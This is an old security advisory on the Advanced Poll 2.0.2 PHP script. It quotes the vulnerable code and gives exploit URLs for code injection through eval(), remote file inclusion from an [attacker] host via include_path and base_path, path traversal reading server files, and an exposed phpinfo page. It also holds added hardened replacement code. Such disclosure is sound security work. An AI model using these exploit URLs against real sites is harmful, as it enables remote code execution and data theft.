[VulnWatch] Advanced Poll : PHP Code Injection, File Include, Phpinfo

From: Frog Man (leseulfrog@private)
Date: Sat Oct 25 2003 - 07:04:55 PDT


    Information :
    °°°°°°°°°°°°°
    Language : PHP
    Product : Advanced Poll
    Version : 2.0.2 Textfile
    Website : http://www.proxy2.de
    Problems :
    - PHP Code Injection
    - File Include
    - Phpinfo
    
    
    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    
    comments.php :
    
    ------------------------------------------------------------------------------------------------------
    [...]
    $register_poll_vars = array("id","template_set","action");
    
    for ($i=0;$i<sizeof($register_poll_vars);$i++) {
        if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
            eval("\$$register_poll_vars[$i] = \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
        } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
            eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
        } else {
            eval("\$$register_poll_vars[$i] = '';");
        }
    }
    [...]
    ------------------------------------------------------------------------------------------------------
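A hardened replacement for the loop above, as an added example that is not part of the advisory or of Advanced Poll's own code; the validation rules at the end are assumptions about what comments.php expects, not something the original code enforces:

```php
<?php
// Added example, not Advanced Poll code: a replacement for the eval()-based
// variable registration in comments.php. Request values are copied into a
// fixed allow-list of names without ever being spliced into PHP source, so a
// value such as  ";phpinfo();//  is stored as an inert string.
$register_poll_vars = array("id", "template_set", "action");

// Read one request parameter by name, POST taking precedence over GET as in
// the original loop, and trim it. Returns '' when the parameter is absent.
// $_POST/$_GET replace the older $HTTP_POST_VARS/$HTTP_GET_VARS arrays.
function poll_request_var($name) {
    if (isset($_POST[$name]) && is_string($_POST[$name])) {
        return trim($_POST[$name]);
    }
    if (isset($_GET[$name]) && is_string($_GET[$name])) {
        return trim($_GET[$name]);
    }
    return '';
}

// Populate one associative array instead of creating loose globals through
// eval(); code that used $id now reads $poll['id'].
$poll = array();
foreach ($register_poll_vars as $name) {
    $poll[$name] = poll_request_var($name);
}

// Constrain each value to the shape the application expects. These rules are
// assumptions for this example (a numeric poll id, a template name with no
// path characters, an action from a fixed set), not from the original code.
if (!ctype_digit($poll['id'])) {
    $poll['id'] = '';
}
if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $poll['template_set'])) {
    $poll['template_set'] = 'default';
}
if (!in_array($poll['action'], array('', 'view', 'post'), true)) {
    $poll['action'] = '';
}
```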
    
    
    
    booth.php, png.php :
    
    ---------------------------------------------------------------
    <?php
    
    $include_path = dirname(__FILE__);
    if ($include_path == "/") {
        $include_path = ".";
    }
    
    if (!isset($PHP_SELF)) {
        global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
        $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
        if (isset($HTTP_GET_VARS)) {
            while (list($name, $value)=each($HTTP_GET_VARS)) {
                $$name=$value;
            }
        }
        if (isset($HTTP_POST_VARS)) {
            while (list($name, $value)=each($HTTP_POST_VARS)) {
                $$name=$value;
            }
        }
        if(isset($HTTP_COOKIE_VARS)){
            while (list($name, $value)=each($HTTP_COOKIE_VARS)){
                $$name=$value;
            }
        }
    }
    
    require $include_path."/include/config.inc.php";
    require $include_path."/include/class_poll.php";
    [...]
    ---------------------------------------------------------------
    
    
    poll_ssi.php, popup.php :
    
    ----------------------
    include "./booth.php";
    ----------------------
    
    
    
    
    admin/common.inc.php :
    
    ---------------------------------------------------------------
    [...]
    if (!isset($PHP_SELF)) {
        $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
        if (isset($HTTP_GET_VARS)) {
            while (list($name, $value)=each($HTTP_GET_VARS)) {
                $$name=$value;
            }
        }
        if (isset($HTTP_POST_VARS)) {
            while (list($name, $value)=each($HTTP_POST_VARS)) {
                $$name=$value;
            }
        }
        if(isset($HTTP_COOKIE_VARS)){
            while (list($name, $value)=each($HTTP_COOKIE_VARS)){
                $$name=$value;
            }
        }
    }
    
    $pollvars['SELF'] = basename($PHP_SELF);
    unset($lang);
    if (file_exists("$base_path/lang/$pollvars[lang]")) {
        include ("$base_path/lang/$pollvars[lang]");
    } else {
        include ("$base_path/lang/english.php");
    }
    [...]
    ---------------------------------------------------------------
    
    
    In the /admin/ directory, the following files :
    
    - index.php
    - admin_tpl_new.php
    - admin_tpl_misc_new.php
    - admin_templates_misc.php
    - admin_templates.php
    - admin_stats.php
    - admin_settings.php
    - admin_preview.php
    - admin_password.php
    - admin_logout.php
    - admin_license.php
    - admin_help.php
    - admin_embed.php
    - admin_edit.php
    - admin_comment.php
    
    contain :
    
    ------------------------------------
    [...]
    $include_path = dirname(__FILE__);
    $base_path = dirname($include_path);
    
    require "./common.inc.php";
    [...]
    ------------------------------------
    
    
    misc/info.php :
    
    -------------------------
    <html>
    <head>
    <title>PHP Info</title>
    </head>
    <body bgcolor="#3A6EA5">
    <?php
    phpinfo();
    ?>
    -------------------------
    
    
    Exploits :
    °°°°°°°°
    
    - if magic_quotes_gpc=OFF :
    
    http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//
    
    or with a POST form or cookies.
    
    - This will only work if register_globals=OFF (this is not a mistake : booth.php copies request variables into globals itself only when $PHP_SELF is not already set, and that copy overwrites $include_path) :
    
    http://[target]/booth.php?include_path=http://[attacker] (or with png.php, 
    poll_ssi.php, popup.php) will include the files :
    http://[attacker]/include/config.inc.php
    and
    http://[attacker]/include/class_poll.php
    
    - This will work whether register_globals=OFF or ON :
    
    http://[target]/admin/common.inc.php?base_path=http://[attacker] will include 
    the file http://[attacker]/lang/english.php.
    
    The same hole can be found in the /admin/ directory, in the files :
    
    - index.php
    - admin_tpl_new.php
    - admin_tpl_misc_new.php
    - admin_templates_misc.php
    - admin_templates.php
    - admin_stats.php
    - admin_settings.php
    - admin_preview.php
    - admin_password.php
    - admin_logout.php
    - admin_license.php
    - admin_help.php
    - admin_embed.php
    - admin_edit.php
    - admin_comment.php
    
    but only with register_globals=OFF.
    With register_globals=OFF, and again for all the files listed above, the url 
    http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view 
    will include the file http://[target]/admin/../../../file/to/view
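One way to close both include paths described above (the request-controlled $base_path and the traversal through $pollvars[lang]), as an added example that is not the advisory's or the vendor's code; it assumes the layout quoted above (admin/common.inc.php, language files in lang/*.php), and the same removal of the $$name=$value registration applies to $include_path in booth.php:

```php
<?php
// Added example, not Advanced Poll code: the include logic of
// admin/common.inc.php rewritten so that neither $base_path nor the language
// file can be chosen by the request. Assumes the layout quoted in the
// advisory: this file lives in admin/, language files in lang/*.php.

// Derive the installation root from this file's own location only. No bulk
// $$name = $value registration of GET/POST/cookie data takes place, so a
// request cannot point $base_path at a remote host or at "..".
$base_path = dirname(dirname(__FILE__));

// Resolve the requested language to a file that really exists in lang/.
// The allow-list is built from the directory listing, and the request may
// only pick an entry by its bare file name, so "../", absolute paths and
// URLs never match anything.
function poll_lang_file($base_path, $requested) {
    $lang_dir = $base_path . '/lang';
    $allowed = array();
    $files = glob($lang_dir . '/*.php');
    if ($files !== false) {
        foreach ($files as $path) {
            $allowed[basename($path)] = $path;
        }
    }
    if (is_string($requested) && isset($allowed[$requested])) {
        return $allowed[$requested];
    }
    return $lang_dir . '/english.php';
}

// Accept pollvars[lang] from the query string, but only as a plain string.
$requested_lang = '';
if (isset($_GET['pollvars']) && is_array($_GET['pollvars'])
        && isset($_GET['pollvars']['lang'])) {
    $requested_lang = $_GET['pollvars']['lang'];
}
include poll_lang_file($base_path, $requested_lang);
```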
    
    
    - http://[target]/misc/info.php will show the phpinfo().
    
    
    Solution/More details :
    °°°°°°°°°°°°°°°°°°°°
    Both the patch and further details can be found at http://www.phpsecure.info.
    
    
    Credits :
    °°°°°°°°
    frog-m@n
    http://www.phpsecure.info
    
    